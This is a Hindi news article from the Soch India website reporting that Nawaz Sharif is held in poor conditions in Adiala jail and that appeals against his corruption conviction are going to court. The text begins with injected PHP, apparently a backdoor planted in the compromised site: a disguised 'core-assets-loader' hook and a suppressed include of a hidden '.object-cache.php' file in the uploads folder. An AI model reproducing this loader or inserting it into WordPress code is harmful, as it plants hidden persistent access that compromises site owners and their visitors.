add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जेल में गंदे वॉशरूम का इस्तेमाल कर रहे हैं नवाज शरीफ, आज सजा के खिलाफ कोर्ट में होगी सुनवाई – SOCH INDIA
Menu

दुनिया
जेल में गंदे वॉशरूम का इस्तेमाल कर रहे हैं नवाज शरीफ, आज सजा के खिलाफ कोर्ट में होगी सुनवाई

nobanner

भ्रष्टाचार के एक मामले जेल में बंद पाकिस्तान के पूर्व प्रधानमंत्री नवाज शरीफ, उनकी बेटी और दामाद की याचिका पर आज इस्लामाबाद हाईकोर्ट में सुनवाई होगी. इस बीच नवाज शरीफ के भाई शहबाज शरीफ ने दावा किया है कि नवाज शरीफ को रावलपिंडी स्थित अडियाला जेल में ‘बेहद खराब हालत ’ में रखा गया है. मीडिया रिपोर्ट्स के मुताबिक, शरीफ को न्यूज पेपर और बिस्तर से वंचित किया गया है और वह ‘गंदे’ वॉशरूम का इस्तेमाल कर रहे हैं.

शरीफ (68) और उनकी बेटी मरयम (44) को गत शुक्रवार को लंदन से लाहौर पहुंचने के बाद गिरफ्तार कर लिया गया था. उससे पहले एक जवाबदेही अदालत ने उन्हें लंदन में चार आलीशान फ्लैटों पर उनके परिवार के स्वामित्व को लेकर दोषी पाया था. गिरफ्तारी के बाद दोनों को बाद में रावलपिंडी की अडियाला जेल में ले जाया गया था. शरीफ के दामाद मुहम्मद सफदर भी अडियाला जेल में हैं. उन्हें आठ जुलाई को गिरफ्तार किया गया था.

डॉन न्यूज की खबर है कि तीनों अभियुक्तों के वकीलों ने अपने मुवक्किलों के विरुद्ध भ्रष्टाचार के मामलों में सात अलग अलग अपीलें दायर कीं. शरीफ की ओर से तीन और मरियम एवं सफदर की ओर से दो दो अपीलें दायर की गयी हैं.